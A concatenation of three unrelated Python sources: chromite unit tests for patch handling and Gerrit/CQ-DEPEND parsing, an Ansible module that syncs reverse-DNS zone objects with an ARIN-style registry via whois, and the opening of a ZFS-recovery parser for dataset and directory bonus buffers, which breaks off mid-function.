    # Note that Apply creates it's own branch, resetting to master
    # thus we have to re-apply (even if it looks stupid, it's right).
    patch2.Apply(git2, self.DEFAULT_TRACKING)
    self.assertRaises2(cros_patch.ApplyPatchException,
                       patch1.Apply, git2, self.DEFAULT_TRACKING,
                       exact_kls=True, check_attrs={'inflight':True})

  def testTrivial(self):
    """Exercise trivial-merge semantics against ToT and inflight states."""
    _, git2, patch1 = self._CommonGitSetup()
    # Throw in a bunch of newlines so that content-merging would work.
    content = 'not foon%s' % ('\n' * 100)
    patch1 = self._MkPatch(git2, self._GetSha1(git2, 'HEAD'))
    patch1 = self.CommitFile(git2, 'monkeys', content)
    git.RunGit(
        git2, ['update-ref', self.DEFAULT_TRACKING, patch1.sha1])
    patch2 = self.CommitFile(git2, 'monkeys', '%sblah' % content)
    patch3 = self.CommitFile(git2, 'monkeys', '%sblahblah' % content)
    # Get us a back to the basic, then derive from there; this is used to
    # verify that even if content merging works, trivial is flagged.
    self.CommitFile(git2, 'monkeys', 'foon')
    patch4 = self.CommitFile(git2, 'monkeys', content)
    patch5 = self.CommitFile(git2, 'monkeys', '%sfoon' % content)
    # Reset so we derive the next changes from patch1.
    git.RunGit(git2, ['reset', '--hard', patch1.sha1])
    patch6 = self.CommitFile(git2, 'blah', 'some-other-file')
    self.CommitFile(git2, 'monkeys',
                    '%sblah' % content.replace('not', 'bot'))

    self.assertRaises2(cros_patch.PatchAlreadyApplied,
                       patch1.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
                       check_attrs={'inflight':False, 'trivial':False})
    # Now test conflicts since we're still at ToT; note that this is an actual
    # conflict because the fuzz anchors have changed.
    self.assertRaises2(cros_patch.ApplyPatchException,
                       patch3.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
                       check_attrs={'inflight':False, 'trivial':False},
                       exact_kls=True)
    # Now test trivial conflict; this would've merged fine were it not for
    # trivial.
    self.assertRaises2(cros_patch.PatchAlreadyApplied,
                       patch4.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
                       check_attrs={'inflight':False, 'trivial':False},
                       exact_kls=True)

    # Move us into inflight testing.
    patch2.Apply(git2, self.DEFAULT_TRACKING, trivial=True)

    # Repeat the tests from above; should still be the same.
    self.assertRaises2(cros_patch.PatchAlreadyApplied,
                       patch4.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
                       check_attrs={'inflight':False, 'trivial':False})
    # Actual conflict merge conflict due to inflight; non trivial induced.
    self.assertRaises2(cros_patch.ApplyPatchException,
                       patch5.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
                       check_attrs={'inflight':True, 'trivial':False},
                       exact_kls=True)
    self.assertRaises2(cros_patch.PatchAlreadyApplied,
                       patch1.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
                       check_attrs={'inflight':False})
    self.assertRaises2(cros_patch.ApplyPatchException,
                       patch5.Apply, git2, self.DEFAULT_TRACKING, trivial=True,
                       check_attrs={'inflight':True, 'trivial':False},
                       exact_kls=True)
    # And this should apply without issue, despite the differing history.
    patch6.Apply(git2, self.DEFAULT_TRACKING, trivial=True)

  def _assertLookupAliases(self, remote):
    """Verify LookupAliases yields every known identifier for a patch."""
    git1 = self._MakeRepo('git1', self.source)
    patch = self.CommitChangeIdFile(git1, remote=remote)
    # Internal patches carry a '*' prefix on all their aliases.
    prefix = '*' if patch.internal else ''
    vals = [patch.sha1, getattr(patch, 'gerrit_number', None),
            getattr(patch, 'original_sha1', None)]
    # Append full Change-ID if it exists.
    if patch.project and patch.tracking_branch and patch.change_id:
      vals.append('%s~%s~%s' % (
          patch.project, patch.tracking_branch, patch.change_id))
    vals = [x for x in vals if x is not None]
    self.assertEqual(set(prefix + x for x in vals), set(patch.LookupAliases()))

  def testExternalLookupAliases(self):
    """LookupAliases for an external-remote patch."""
    self._assertLookupAliases(constants.EXTERNAL_REMOTE)

  def testInternalLookupAliases(self):
    """LookupAliases for an internal-remote patch."""
    self._assertLookupAliases(constants.INTERNAL_REMOTE)

  def _CheckPaladin(self, repo, master_id, ids, extra):
    """Commit with CQ-DEPEND text `extra` and verify parsed dependencies."""
    patch = self.CommitChangeIdFile(
        repo, master_id, extra=extra,
        filename='paladincheck', content=str(_GetNumber()))
    deps = patch.PaladinDependencies(repo)
    # Assert that our parsing unique'ifies the results.
    self.assertEqual(len(deps), len(set(deps)))
    # Verify that we have the correct dependencies.
    dep_ids = []
    dep_ids += [(dep.remote, dep.change_id) for dep in deps
                if dep.change_id is not None]
    dep_ids += [(dep.remote, dep.gerrit_number) for dep in deps
                if dep.gerrit_number is not None]
    dep_ids += [(dep.remote, dep.sha1) for dep in deps
                if dep.sha1 is not None]
    for input_id in ids:
      change_tuple = cros_patch.StripPrefix(input_id)
      self.assertTrue(change_tuple in dep_ids)
    return patch

  def testPaladinDependencies(self):
    """Exercise CQ-DEPEND parsing: valid forms, limits, and bad syntax."""
    git1 = self._MakeRepo('git1', self.source)
    cid1, cid2, cid3, cid4 = self.MakeChangeId(4)
    # Verify it handles nonexistant CQ-DEPEND.
    self._CheckPaladin(git1, cid1, [], '')
    # Single key, single value.
    self._CheckPaladin(git1, cid1, [cid2],
                       'CQ-DEPEND=%s' % cid2)
    # Single key, gerrit number.
    self._CheckPaladin(git1, cid1, ['123'],
                       'CQ-DEPEND=%s' % 123)
    # Single key, gerrit number.
    self._CheckPaladin(git1, cid1, ['123456'],
                       'CQ-DEPEND=%s' % 123456)
    # Single key, gerrit number; ensure it
    # cuts off before a million changes (this
    # is done to avoid collisions w/ sha1 when
    # we're using shortened versions).
    self.assertRaises(cros_patch.BrokenCQDepends,
                      self._CheckPaladin, git1, cid1,
                      ['1234567'], 'CQ-DEPEND=%s' % '1234567')
    # Single key, gerrit number, internal.
    self._CheckPaladin(git1, cid1, ['*123'],
                       'CQ-DEPEND=%s' % '*123')
    # Ensure SHA1's aren't allowed.
    sha1 = '0' * 40
    self.assertRaises(cros_patch.BrokenCQDepends,
                      self._CheckPaladin, git1, cid1,
                      [sha1], 'CQ-DEPEND=%s' % sha1)
    # Single key, multiple values
    self._CheckPaladin(git1, cid1, [cid2, '1223'],
                       'CQ-DEPEND=%s %s' % (cid2, '1223'))
    # Dumb comma behaviour
    self._CheckPaladin(git1, cid1, [cid2, cid3],
                       'CQ-DEPEND=%s, %s,' % (cid2, cid3))
    # Multiple keys.
    self._CheckPaladin(git1, cid1, [cid2, '*245', cid4],
                       'CQ-DEPEND=%s, %s\nCQ-DEPEND=%s' % (cid2, '*245', cid4))
    # Ensure it goes boom on invalid data.
    self.assertRaises(cros_patch.BrokenCQDepends, self._CheckPaladin,
                      git1, cid1, [], 'CQ-DEPEND=monkeys')
    self.assertRaises(cros_patch.BrokenCQDepends, self._CheckPaladin,
                      git1, cid1, [], 'CQ-DEPEND=%s monkeys' % (cid2,))
    # Validate numeric is allowed.
    self._CheckPaladin(git1, cid1, [cid2, '1'], 'CQ-DEPEND=1 %s' % cid2)
    # Validate that it unique'ifies the results.
    self._CheckPaladin(git1, cid1, ['1'], 'CQ-DEPEND=1 1')
    # Invalid syntax
    self.assertRaises(cros_patch.BrokenCQDepends, self._CheckPaladin,
                      git1, cid1, [], 'CQ-DEPENDS=1')
    self.assertRaises(cros_patch.BrokenCQDepends, self._CheckPaladin,
                      git1, cid1, [], 'CQ_DEPEND=1')
class TestApplyAgainstManifest(GitRepoPatchTestCase,
                               cros_test_lib.MockTestCase):
  """Test applying a patch against a manifest"""

  MANIFEST_TEMPLATE = (
"""<?xml version="1.0" encoding="UTF-8"?>
<manifest>
<remote name="cros" />
<default revision="refs/heads/master" remote="cros" />
%(projects)s
</manifest>
"""
  )

  def _CommonRepoSetup(self, *projects):
    """Write a .repo/manifest.xml describing `projects`; return the basedir.

    Each project is a dict of manifest attributes; 'path' values are
    rewritten relative to the tempdir so the manifest stays relocatable.
    """
    basedir = self.tempdir
    repodir = os.path.join(basedir, '.repo')
    manifest_file = os.path.join(repodir, 'manifest.xml')
    proj_pieces = []
    for project in projects:
      proj_pieces.append('<project')
      for key, val in project.items():
        if key == 'path':
          val = os.path.relpath(os.path.realpath(val),
                                os.path.realpath(self.tempdir))
        proj_pieces.append(' %s="%s"' % (key, val))
      proj_pieces.append(' />\n  ')
    proj_str = ''.join(proj_pieces)

    content = self.MANIFEST_TEMPLATE % {'projects': proj_str}
    os.mkdir(repodir)
    osutils.WriteFile(manifest_file, content)
    return basedir

  def testApplyAgainstManifest(self):
    """Patches applied against a manifest stack up on the patch branch."""
    git1, git2, _ = self._CommonGitSetup()
    readme_text = "Dummy README text."
    readme1 = self.CommitFile(git1, "README", readme_text)
    readme_text += " Even more dummy README text."
    readme2 = self.CommitFile(git1, "README", readme_text)
    readme_text += " Even more README text."
    readme3 = self.CommitFile(git1, "README", readme_text)
    git1_proj = {'path': git1,
                 'name': 'chromiumos/chromite',
                 'revision': str(readme1.sha1),
                 'upstream': 'refs/heads/master'
                }
    git2_proj = {'path': git2,
                 'name': 'git2'
                }
    basedir = self._CommonRepoSetup(git1_proj, git2_proj)
    # pylint: disable=E1101
    self.PatchObject(git.ManifestCheckout, '_GetManifestsBranch',
                     return_value=None)
    manifest = git.ManifestCheckout(basedir)
    readme2.ApplyAgainstManifest(manifest)
    readme3.ApplyAgainstManifest(manifest)
    # Verify that both readme2 and readme3 are on the patch branch.
    shas = self._run(['git', 'log', '--format=%H',
                      '%s..%s' % (readme1.sha1, constants.PATCH_BRANCH)],
                     git1).splitlines()
    self.assertEqual(shas, [str(readme3.sha1), str(readme2.sha1)])
class TestLocalPatchGit(GitRepoPatchTestCase):
  """Test Local patch handling."""

  patch_kls = cros_patch.LocalPatch

  def setUp(self):
    self.sourceroot = os.path.join(self.tempdir, 'sourceroot')

  def _MkPatch(self, source, sha1, ref='refs/heads/master', **kwargs):
    """Build a LocalPatch; note sha1 is positional for this patch class."""
    remote = kwargs.pop('remote', constants.EXTERNAL_REMOTE)
    return self.patch_kls(source, 'chromiumos/chromite', ref,
                          '%s/master' % remote, remote, sha1, **kwargs)

  def testUpload(self):
    """Verify Upload pushes the patch (and its carbon copy) correctly."""
    def ProjectDirMock(_sourceroot):
      return git1

    git1, git2, patch = self._CommonGitSetup()

    git2_sha1 = self._GetSha1(git2, 'HEAD')

    patch.ProjectDir = ProjectDirMock
    # First suppress carbon copy behaviour so we verify pushing
    # plain works.
    # pylint: disable=E1101
    sha1 = patch.sha1
    patch._GetCarbonCopy = lambda: sha1
    patch.Upload(git2, 'refs/testing/test1')
    self.assertEqual(self._GetSha1(git2, 'refs/testing/test1'),
                     patch.sha1)

    # Enable CarbonCopy behaviour; verify it lands a different
    # sha1.  Additionally verify it didn't corrupt the patch's sha1 locally.
    del patch._GetCarbonCopy
    patch.Upload(git2, 'refs/testing/test2')
    self.assertNotEqual(self._GetSha1(git2, 'refs/testing/test2'),
                        patch.sha1)
    self.assertEqual(patch.sha1, sha1)
    # Ensure the carbon creation didn't damage the target repo.
    self.assertEqual(self._GetSha1(git1, 'HEAD'), sha1)

    # Ensure we didn't damage the target repo's state at all.
    self.assertEqual(git2_sha1, self._GetSha1(git2, 'HEAD'))
    # Ensure the content is the same.
    base = ['git', 'show']
    self.assertEqual(
        self._run(base + ['refs/testing/test1:monkeys'], git2),
        self._run(base + ['refs/testing/test2:monkeys'], git2))
    base = ['git', 'log', '--format=%B', '-n1']
    self.assertEqual(
        self._run(base + ['refs/testing/test1'], git2),
        self._run(base + ['refs/testing/test2'], git2))
class TestUploadedLocalPatch(GitRepoPatchTestCase):
  """Test uploading of local git patches."""

  PROJECT = 'chromiumos/chromite'
  ORIGINAL_BRANCH = 'original_branch'
  ORIGINAL_SHA1 = 'ffffffff'.ljust(40, '0')
  patch_kls = cros_patch.UploadedLocalPatch

  def _MkPatch(self, source, sha1, ref='refs/heads/master', **kwargs):
    """Build an UploadedLocalPatch carrying the original branch/sha1."""
    remote = kwargs.pop('remote', constants.EXTERNAL_REMOTE)
    tracking = '%s/master' % constants.EXTERNAL_REMOTE
    return self.patch_kls(source, self.PROJECT, ref, tracking,
                          self.ORIGINAL_BRANCH, self.ORIGINAL_SHA1,
                          remote, carbon_copy_sha1=sha1, **kwargs)

  def testStringRepresentation(self):
    """str(patch) must expose project, original branch and short sha1."""
    _, _, patch = self._CommonGitSetup()
    parts = str(patch).split(':')
    for expected in (self.PROJECT, self.ORIGINAL_BRANCH,
                     self.ORIGINAL_SHA1[:8]):
      self.assertTrue(expected in parts,
                      msg="Couldn't find %s in %s" % (expected, parts))
class TestGerritPatch(GitRepoPatchTestCase):
  """Test Gerrit patch handling."""

  has_native_change_id = True

  class patch_kls(cros_patch.GerritPatch):
    """Test helper class to suppress pointing to actual gerrit."""
    # Suppress the behaviour pointing the project url at actual gerrit,
    # instead slaving it back to a local repo for tests.
    def __init__(self, *args, **kwargs):
      cros_patch.GerritPatch.__init__(self, *args, **kwargs)
      assert hasattr(self, 'patch_dict')
      self.project_url = self.patch_dict['_unittest_url_bypass']

  @property
  def test_json(self):
    # Deep copy so each test gets its own mutable json fixture.
    return copy.deepcopy(FAKE_PATCH_JSON)

  def _MkPatch(self, source, sha1, ref='refs/heads/master', **kwargs):
    """Build a GerritPatch from fixture json, backed by a local repo."""
    json = self.test_json
    remote = kwargs.pop('remote', constants.EXTERNAL_REMOTE)
    url_prefix = kwargs.pop('url_prefix', constants.EXTERNAL_GERRIT_URL)
    suppress_branch = kwargs.pop('suppress_branch', False)
    change_id = kwargs.pop('ChangeId', None)
    if change_id is None:
      change_id = self.MakeChangeId()
    json.update(kwargs)
    change_num, patch_num = _GetNumber(), _GetNumber()
    # Note we intentionally use a gerrit like refspec here; we want to
    # ensure that none of our common code pathways puke on a non head/tag.
    refspec = gerrit.GetChangeRef(change_num + 1000, patch_num)
    json['currentPatchSet'].update(
        dict(number=patch_num, ref=refspec, revision=sha1))
    json['branch'] = os.path.basename(ref)
    json['_unittest_url_bypass'] = source
    json['id'] = change_id

    obj = self.patch_kls(json.copy(), remote, url_prefix)
    self.assertEqual(obj.patch_dict, json)
    self.assertEqual(obj.remote, remote)
    self.assertEqual(obj.url_prefix, url_prefix)
    self.assertEqual(obj.project, json['project'])
    self.assertEqual(obj.ref, refspec)
    self.assertEqual(obj.change_id, change_id)
    self.assertEqual(obj.id, '%s%s~%s~%s' % (
        constants.CHANGE_PREFIX[remote], json['project'],
        json['branch'], change_id))
    # Now make the fetching actually work, if desired.
    if not suppress_branch:
      # Note that a push is needed here, rather than a branch; branch
      # will just make it under refs/heads, we want it literally in
      # refs/changes/
      self._run(['git', 'push', source, '%s:%s' % (sha1, refspec)], source)
    return obj

  def testApprovalTimestamp(self):
    """Test that the approval timestamp is correctly extracted from JSON."""
    repo = self._MakeRepo('git', self.source)
    for approvals, expected in [(None, 0), ([], 0), ([1], 1), ([1, 3, 2], 3)]:
      currentPatchSet = copy.deepcopy(FAKE_PATCH_JSON['currentPatchSet'])
      if approvals is not None:
        currentPatchSet['approvals'] = [{'grantedOn': x} for x in approvals]
      patch = self._MkPatch(repo, self._GetSha1(repo, self.DEFAULT_TRACKING),
                            currentPatchSet=currentPatchSet)
      msg = 'Expected %r, but got %r (approvals=%r)' % (
          expected, patch.approval_timestamp, approvals)
      self.assertEqual(patch.approval_timestamp, expected, msg)

  def _assertGerritDependencies(self, remote=constants.EXTERNAL_REMOTE):
    """Verify GerritDependencies reflects the dependsOn json section."""
    convert = str
    if remote == constants.INTERNAL_REMOTE:
      # Internal dependencies carry a '*' prefix.
      convert = lambda val: '*%s' % (val,)
    git1 = self._MakeRepo('git1', self.source, remote=remote)
    patch = self._MkPatch(git1, self._GetSha1(git1, 'HEAD'), remote=remote)
    cid1, cid2 = '1', '2'

    # Test cases with no dependencies, 1 dependency, and 2 dependencies.
    self.assertEqual(patch.GerritDependencies(), [])

    patch.patch_dict['dependsOn'] = [{'number': cid1}]
    self.assertEqual(
        [cros_patch.AddPrefix(x, x.gerrit_number)
         for x in patch.GerritDependencies()],
        [convert(cid1)])

    patch.patch_dict['dependsOn'].append({'number': cid2})
    self.assertEqual(
        [cros_patch.AddPrefix(x, x.gerrit_number)
         for x in patch.GerritDependencies()],
        [convert(cid1), convert(cid2)])

  def testExternalGerritDependencies(self):
    """Dependencies for an external-remote patch."""
    self._assertGerritDependencies()

  def testInternalGerritDependencies(self):
    """Dependencies for an internal-remote patch."""
    self._assertGerritDependencies(constants.INTERNAL_REMOTE)
class PrepareRemotePatchesTest(cros_test_lib.TestCase):
  """Test preparing remote patches."""

  def MkRemote(self,
               project='my/project', original_branch='my-local',
               ref='refs/tryjobs/elmer/patches', tracking_branch='master',
               internal=False):
    """Build a colon-delimited remote patch specification string."""
    tag_attr = '%s_PATCH_TAG' % ('INTERNAL' if internal else 'EXTERNAL')
    pieces = [project, original_branch, ref, tracking_branch,
              getattr(constants, tag_attr)]
    return ':'.join(pieces)

  def assertRemote(self, patch, project='my/project',
                   original_branch='my-local',
                   ref='refs/tryjobs/elmer/patches', tracking_branch='master',
                   internal=False):
    """Assert all identifying attributes of a parsed remote patch."""
    expectations = (('project', project),
                    ('original_branch', original_branch),
                    ('ref', ref),
                    ('tracking_branch', tracking_branch),
                    ('internal', internal))
    for attr, expected in expectations:
      self.assertEqual(getattr(patch, attr), expected)

  def test(self):
    """Parse single and multiple specs; reject malformed ones."""
    # Check handling of a single patch...
    parsed = cros_patch.PrepareRemotePatches([self.MkRemote()])
    self.assertEqual(len(parsed), 1)
    self.assertRemote(parsed[0])

    # Check handling of a multiple...
    parsed = cros_patch.PrepareRemotePatches(
        [self.MkRemote(), self.MkRemote(project='foon')])
    self.assertEqual(len(parsed), 2)
    self.assertRemote(parsed[0])
    self.assertRemote(parsed[1], project='foon')

    # Ensure basic validation occurs:
    chunks = self.MkRemote().split(':')
    for malformed in (':'.join(chunks[:-1]),
                      ':'.join(chunks[:-1] + ['monkeys']),
                      ':'.join(chunks + [':'])):
      self.assertRaises(ValueError, cros_patch.PrepareRemotePatches,
                        malformed)
class PrepareLocalPatchesTests(cros_build_lib_unittest.RunCommandTestCase):
  """Test preparing local patches."""

  def setUp(self):
    # Golden values the mocked manifest/checkout will hand back.
    self.path, self.project, self.branch = 'mydir', 'my/project', 'mybranch'
    self.tracking_branch = 'kernel'
    self.patches = ['%s:%s' % (self.project, self.branch)]
    self.manifest = mock.MagicMock()
    attrs = dict(tracking_branch=self.tracking_branch,
                 local_path=self.path,
                 remote='cros')
    checkout = git.ProjectCheckout(attrs)
    self.PatchObject(
        self.manifest, 'FindCheckouts', return_value=[checkout]
    )

  def PrepareLocalPatches(self, output):
    """Check the returned GitRepoPatchInfo against golden values."""
    output_obj = mock.MagicMock()
    output_obj.output = output
    self.PatchObject(cros_patch.LocalPatch, 'Fetch', return_value=output_obj)
    self.PatchObject(git, 'RunGit', return_value=output_obj)
    patch_info, = cros_patch.PrepareLocalPatches(self.manifest, self.patches)
    # assertEqual, not the deprecated assertEquals alias.
    self.assertEqual(patch_info.project, self.project)
    self.assertEqual(patch_info.ref, self.branch)
    self.assertEqual(patch_info.tracking_branch, self.tracking_branch)

  def testBranchSpecifiedSuccessRun(self):
    """Test success with branch specified by user."""
    self.PrepareLocalPatches('12345'.rjust(40, '0'))

  def testBranchSpecifiedNoChanges(self):
    """Test when no changes on the branch specified by user."""
    self.assertRaises(SystemExit, self.PrepareLocalPatches, '')
class TestFormatting(cros_test_lib.TestCase):
  """Test formatting of output."""

  def _assertResult(self, functor, value, expected=None, raises=False,
                    **kwargs):
    """Assert functor(value) == expected, or that it raises ValueError."""
    if raises:
      self.assertRaises2(ValueError, functor, value,
                         msg="%s(%r) did not throw a ValueError"
                         % (functor.__name__, value), **kwargs)
    else:
      self.assertEqual(functor(value, **kwargs), expected,
                       msg="failed: %s(%r) != %r"
                       % (functor.__name__, value, expected))

  def _assertBad(self, functor, values, **kwargs):
    """Assert every value in `values` raises ValueError through functor."""
    for value in values:
      self._assertResult(functor, value, raises=True, **kwargs)

  def _assertGood(self, functor, values, **kwargs):
    """Assert each (value, expected) pair parses as expected."""
    for value, expected in values:
      self._assertResult(functor, value, expected, **kwargs)

  # BUG FIX: the following four methods were named TestGerritNumber,
  # TestChangeID, TestSHA1 and TestFullChangeID.  unittest discovers test
  # methods by the lowercase 'test' prefix, so they were silently never
  # executed; renamed so they actually run.
  def testGerritNumber(self):
    """Tests that we can parse a Gerrit number."""
    self._assertGood(cros_patch.ParseGerritNumber,
                     [('12345',) * 2, ('12',) * 2, ('123',) * 2])
    self._assertBad(
        cros_patch.ParseGerritNumber,
        ['is', 'i1325', '01234567', '012345a', '**12345', '+123', '/0123'],
        error_ok=False)

  def testChangeID(self):
    """Tests that we can parse a change-ID."""
    self._assertGood(cros_patch.ParseChangeID,
                     [('I47ea30385af60ae4cc2acc5d1a283a46423bc6e1',) * 2])
    # Change-IDs too short/long, with unexpected characters in it.
    self._assertBad(
        cros_patch.ParseChangeID,
        ['is', '**i1325', 'i134'.ljust(41, '0'), 'I1234+'.ljust(41, '0'),
         'I123'.ljust(42, '0')],
        error_ok=False)

  def testSHA1(self):
    """Tests that we can parse a SHA1 hash."""
    self._assertGood(cros_patch.ParseSHA1,
                     [('1' * 40,) * 2,
                      ('a' * 40,) * 2,
                      ('1a7e034'.ljust(40, '0'),) * 2])
    self._assertBad(
        cros_patch.ParseSHA1,
        ['0abcg', 'Z', '**a', '+123', '1234ab' * 10],
        error_ok=False)

  def testFullChangeID(self):
    """Tests that we can parse a full change-ID."""
    change_id = 'I47ea30385af60ae4cc2acc5d1a283a46423bc6e1'
    self._assertGood(cros_patch.ParseFullChangeID,
                     [('foo~bar~%s' % change_id, ('foo', 'bar', change_id)),
                      ('foo/bar/baz~refs/heads/_my-branch_~%s' % change_id,
                       ('foo/bar/baz', '_my-branch_', change_id))])
    self._assertBad(
        cros_patch.ParseFullChangeID,
        ['foo', 'foo~bar', 'foo~bar~baz', 'foo~refs/bar~%s' % change_id],
        error_ok=False)

  def testParsePatchDeps(self):
    """Tests that we can parse the dependency specified by the user."""
    change_id = 'I47ea30385af60ae4cc2acc5d1a283a46423bc6e1'
    vals = ['CL:12345', 'project~branch~%s' % change_id, change_id,
            change_id[1:]]
    for val in vals:
      self.assertTrue(cros_patch.ParsePatchDep(val) is not None)

    self._assertBad(cros_patch.ParsePatchDep,
                    ['1454623', 'I47ea3', 'i47ea3'.ljust(41, '0')])
# Standard chromite test entry point.
if __name__ == '__main__':
  cros_test_lib.main()
|
#!/usr/bin/env python3
import yaml
import jinja2
import ipwhois
import subprocess
from ansible.module_utils.basic import AnsibleModule
from ansible.errors import AnsibleError
DOCUMENTATION = """
---
module: dns_sync_arin.py
short_description: Synchronize reverse zones with ARIN
options:
irr:
required: true
description:
- IRR to target
contact:
required: true
description:
- Object to use as a contact
mntner:
required: true
description:
- Object to use as a maintainer
reverses:
required: true
description:
- reverse zones as provided by dns_sync
"""
RETURN = """
reverses:
description: a list of remaining reverse zones (not ones processed here)
type: dict
returned: always
records:
description: record to be sent for sync through GPG-email
type: str
returned: changed
"""
def run_module():
    """Synchronize reverse DNS "domain" objects with an ARIN-style IRR.

    For each reverse zone whose RDAP registry matches the target IRR,
    render the wanted RPSL domain object and compare it against the
    object currently served by the IRR's whois.  Results:

      changed:  True when at least one zone differs from the IRR copy.
      diff:     per-zone before/after (only in diff mode).
      records:  RPSL text of the zones that must be (re)submitted.
      reverses: zones NOT handled here, passed on to another backend.
    """
    module_args = dict(
        irr=dict(type='str', required=True),
        contact=dict(type='str', required=True),
        mntner=dict(type='str', required=True),
        reverses=dict(type='dict', required=True),
    )

    result = dict(
        changed=False,
    )

    module = AnsibleModule(
        argument_spec=module_args,
        supports_check_mode=True
    )

    wanted = {}
    got = {}
    data = module.params['reverses']
    irr = module.params['irr']

    # Loop-invariant work hoisted out of the zone loop: compile the RPSL
    # template and compute the whois server name once.
    template = jinja2.Template("""
domain: {{ zone }}
descr: Reverse zone for {{ net }}
{%- for ns in nss %}
nserver: {{ ns }}
{%- endfor %}
admin-c: {{ contact }}
tech-c: {{ contact }}
zone-c: {{ contact }}
mnt-by: {{ mntner }}
source: {{ irr }}
""".strip())
    whois_server = f"whois.{irr.lower()}.net"

    for zone, details in data.items():
        try:
            whois = ipwhois.IPWhois(
                address=details['net'].split("/")[0]).lookup_rdap(
                    asn_methods=['whois', 'http'])
        except ipwhois.exceptions.IPDefinedError:
            # Reserved/private space has no registry data; skip it.
            continue
        if not whois['asn_registry'].upper().startswith(irr):
            # Zone belongs to another registry; leave it for other backends.
            continue
        # Then, update
        wanted[zone] = template.render(zone=zone,
                                       irr=irr,
                                       contact=module.params['contact'],
                                       mntner=module.params['mntner'],
                                       net=details["net"],
                                       nss=details["ns"])
        # Grab existing records
        args = ["whois",
                "-h", whois_server,
                "-s", irr,
                "-BrG",
                "-T", "domain",
                zone]
        proc = subprocess.run(args, capture_output=True)
        if proc.returncode != 0:
            raise AnsibleError(
                f"unable to query whois: {args}")
        # Drop comments and volatile timestamps before comparing.
        out = [line.strip()
               for line in proc.stdout.decode('ascii').split("\n")
               if line.strip() and not line.startswith(("%",
                                                        "last-modified:",
                                                        "created:"))]
        if out:
            got[zone] = "\n".join(out)

    if got != wanted:
        result['changed'] = True
        if module._diff:
            result['diff'] = [
                dict(before_header=k,
                     after_header=k,
                     before=got.get(k, ""),
                     after=wanted.get(k, ""))
                for k in set((*wanted.keys(), *got.keys()))
                if k not in wanted or k not in got or wanted[k] != got[k]]
        result['records'] = "\n\n".join([wanted[zone]
                                         for zone in wanted
                                         if zone not in got
                                         or got[zone] != wanted[zone]])
    # Hand back only the zones this backend did not process.
    result['reverses'] = {k: v
                          for k, v in data.items()
                          if k not in wanted}
    module.exit_json(**result)
def main():
    """Module entry point."""
    run_module()


if __name__ == '__main__':
    main()
|
<reponame>hiliev/py-zfs-recovery
# Copyright (c) 2017 <NAME> <<EMAIL>>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import struct, datetime
from zfs.blockptr import BlockPtr
from zfs.obj_desc import DMU_TYPE_DESC
BLKPTR_OFFSET = 64
class BonusDataset:
    """Dataset bonus buffer: 16 uint64 fields followed by a 128-byte block pointer."""

    def __init__(self, data):
        # Native-endian unpack of the 16 fixed 64-bit fields.
        values = struct.unpack("=16Q", data[:16 * 8])
        (self.ds_dir_obj, self.ds_prev_snap_obj, self.ds_prev_snap_txg,
         self.ds_prev_next_obj, self.ds_snapnames_zapobj,
         self.ds_num_children, self.ds_creation_time, self.ds_creation_txg,
         self.ds_deadlist_obj, self.ds_used_bytes, self.ds_compressed_bytes,
         self.ds_uncompressed_bytes, self.ds_unique_bytes, self.ds_fsid_guid,
         self.ds_guid, self.ds_restoring) = values
        # The block pointer immediately follows the fixed fields.
        self.bptr = BlockPtr()
        self.bptr.parse(data[16 * 8:16 * 8 + 128])

    def __str__(self):
        pairs = (
            ('ds_dir_obj', self.ds_dir_obj),
            ('ds_prev_snap_obj', self.ds_prev_snap_obj),
            ('ds_prev_snap_txg', self.ds_prev_snap_txg),
            ('ds_prev_next_obj', self.ds_prev_next_obj),
            ('ds_snapnames_zapobj', self.ds_snapnames_zapobj),
            ('ds_num_children', self.ds_num_children),
            ('ds_creation_time', self.ds_creation_time),
            ('ds_creation_txg', self.ds_creation_txg),
            ('ds_deadlist_obj', self.ds_deadlist_obj),
            ('ds_used_bytes', self.ds_used_bytes),
            ('ds_compressed_bytes', self.ds_compressed_bytes),
            ('ds_uncompressed_bytes', self.ds_uncompressed_bytes),
            ('ds_unique_bytes', self.ds_unique_bytes),
            ('ds_fsid_guid', self.ds_fsid_guid),
            ('ds_guid', self.ds_guid),
            ('ds_restoring', self.ds_restoring),
            ('ds_bp', self.bptr),
        )
        return ' '.join('%s=%s' % (name, value) for name, value in pairs)
class BonusDirectory:
    """Directory bonus buffer: 11 fixed uint64 fields."""

    # Field names in on-disk order; used by both parsing and printing.
    _FIELD_NAMES = (
        'dd_creation_time',
        'dd_head_dataset_obj',
        'dd_parent_obj',
        'dd_clone_parent_obj',
        'dd_child_dir_zapobj',
        'dd_used_bytes',
        'dd_compressed_bytes',
        'dd_uncompressed_bytes',
        'dd_quota',
        'dd_reserved',
        'dd_props_zapobj',
    )

    def __init__(self, data):
        # Native-endian unpack of the 11 fixed 64-bit fields.
